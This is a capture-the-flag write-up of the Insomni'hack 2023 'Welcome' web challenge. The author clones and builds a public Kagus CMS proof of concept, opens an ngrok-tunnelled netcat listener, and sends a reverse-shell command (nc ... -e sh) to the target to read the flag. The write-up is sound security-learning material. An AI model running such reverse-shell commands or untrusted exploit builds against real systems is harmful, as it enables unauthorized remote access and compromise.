Insomni'hack Teaser : Welcome

Statement:

! Welcome to Insomnihack 2023 !

Let’s start with an easy and well-known web exploitation.

A hipster welcome for hipster scriptkiddies, here you go!

https://welcome.insomnihack.ch:8443

The URL provided in the statement refers to a login page using the Kagus CMS. insomnihack

By filling the fields with random values, the server sends me back the following answer :

HTTP/1.1 200 OK
Date: Sat, 21 Jan 2023 14:16:19 GMT
Server: Apache/2.4.54 (Unix) OpenSSL/3.0.7
X-Powered-By: PHP/8.1.14
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101

This Kagus installation deactivated the login form.<br>It will not be possible to connect through it.

After a few tries, the login page seemed to be secure so I decided to go to the editor’s website present on the footer of the page : https://kagus-cms.com

On the site, in the released page, I see that there was a fix on the login form for the release v23.1.0 : insomnihack1

Our target is still on the v22.4.2 version, it seems exploitable !

The link refers to a git repository containing the POC to exploit this vulnerability.

I start by cloning the git repos and build binary :

git clone https://github.com/Tomat0Soup/Kagus-PoC.git
cd Kagus-PoC && go build

I setup my environment to receive the revshell :

ngrok tcp 1337
nc -lvnp 1337

Then I execute the binary by specifying the target and command : ./kagus_exploit

Target (e.g. https://localhost:9000):
https://welcome.insomnihack.ch:8443
Command (e.g. nc 192.168.0.10 2345 -e sh):
nc 7.tcp.eu.ngrok.io 18603 -e sh
[*] INFO: Preparing to send command: "nc 7.tcp.eu.ngrok.io 18603 -e sh" to "https://welcome.insomnihack.ch:8443"
[*] INFO: Sending request...
[*] INFO: Request sent, status: 504
[*] INFO: The command "%s" should have been executed on %s.
 nc 7.tcp.eu.ngrok.io 18603 -e sh https://welcome.insomnihack.ch:8443/admin/api/v22.4/users/createUserAccount.php

I get my revshell, I just have to cat the flag :

Listening on 0.0.0.0 1337
Connection received on 127.0.0.1 38762
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
ls
createUserAccount.php
info_flag	
cat info_flag
The flag is located at /flag.txt
cat /flag.txt
INS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}

Flag: INS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}